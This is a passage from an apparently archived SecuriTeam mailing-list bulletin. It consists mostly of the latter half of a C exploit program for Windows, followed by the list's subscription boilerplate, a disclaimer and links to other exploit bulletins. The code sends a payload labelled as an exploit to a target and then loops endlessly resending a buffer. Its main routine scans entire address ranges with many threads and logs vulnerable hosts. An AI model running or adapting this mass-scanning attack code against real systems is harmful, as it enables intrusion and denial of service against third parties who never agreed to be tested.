     *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
     *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
      
      closesocket(sock);
      if(atack)
      {
       sock=socket(2,1,0);
       WSAConnect(sock,(struct sockaddr
    *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL);
      
       if (send(sock,(const char *)bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
       {
       printf("%s - send failed %d\n",ip,WSAGetLastError());
       return 0;
       }
       else {printf("%s - send exploit to %s\n",ip,target_os[vers].target);}
       
       len=recv(sock,(char *)buf1,1000,NULL);
       bool ft=1;
       if(ft)
       {
        int i=0;
        while(1)
        {
         if (send(sock,(const char *)buf2,len1,0)==SOCKET_ERROR)
         {
           printf("\nSend failed.Error:%d\n",WSAGetLastError());
           return 0;
         }
         else
         {
           printf("\r%d",++i);
         }
         //Sleep(1000);
        }
       }
       send(sock,(const char *)buf2,len1,0);
       closesocket(sock);
      }
      else fprintf(fp1,"%s %s\n",target_os[vers].target,ip);
    // fp=fopen("pac","wb");
    // fwrite(rawData,1,1036,fp);
    // fclose(fp);
    }
    unsigned long thread_count=0;
    char adr[200];

    DWORD WINAPI ThreadProc(
    LPVOID lpParameter // thread data
    )
    {
      thread_count++;
      attack(adr,0);

      thread_count--;
      return 0;
    }

    void main(int argc,char ** argv)
    {
    //printf("%x %x",OF_READWRITE,GETSTRCS(argv[1]));
    //return;
    //HFILE hf=_lopen("asd123",0x1001);
    //printf("%x",hf);
    //_lclose(hf);
    //return;

    WSADATA wsaData;

    int wVersionRequested;
    wVersionRequested = MAKEWORD( 2, 2 );

    int err = WSAStartup( wVersionRequested, &wsaData );
    if ( err != 0 ) {
     /* Tell the user that we could not find a usable */
     /* WinSock DLL. */
     return;
    }

      if(strchr(argv[1],'.'))
      {
       attack(argv[1],1);
       Sleep(20000);
       return;
      }
      int cb=1,db=1;
      cb=atoi(argv[3]);
      db=atoi(argv[4]);
      long tm=atoi(argv[5]);
      for(int c=cb;c<255;c++)
      {
       for(int d=db;d<255;d++)
       {
        sprintf(adr,"%s.%s.%d.%d",argv[1],argv[2],c,d);
        if(thread_count>tm) while(thread_count>tm) Sleep(100);
        CreateThread(NULL,0,&ThreadProc,"",0,NULL);
        Sleep(10);
        fflush(fp1);
       }
      }
      Sleep(60000);
      fclose(fp1);

    }

    ADDITIONAL INFORMATION

    The information has been provided by karlss0n.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[UNIX] Multiple SQL Injection Vulnerabilities in DeskPRO"

    Relevant Pages

    • [EXPL] Serv-U FTPD "SITE CHMOD" Command Remote Exploit
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... unsigned char szCommand; ... // 28 bytes decode by lion, ... void shell (int sock) ...
      (Securiteam)
    • [UNIX] X-Chat Socks5 Buffer Overflow Vulnerability (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... unsigned int packetlen, addrlen; ... unsigned char buf; ... void getshell; ...
      (Securiteam)
    • [NT] Stronghold DoS
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... In the packet used for joining the server is locatd the client's nickname ... unsigned char *gssdkcr( ... void show_info(u_char *data, int len); ...
      (Securiteam)
    • [EXPL] Quake 3 Buffer Overflow (Exploit)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... port and exit cleanly with an unsuspicious error message. ... unsigned char ipx; ... int hooklen; // for both sendservercommand and directconnect ...
      (Securiteam)
    • [EXPL] Microsoft Word Buffer Overflow (Exploit 2)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Microsoft Word Buffer Overflow ... invalid memory acess and in some cases arbitrary overwrites. ...
      (Securiteam)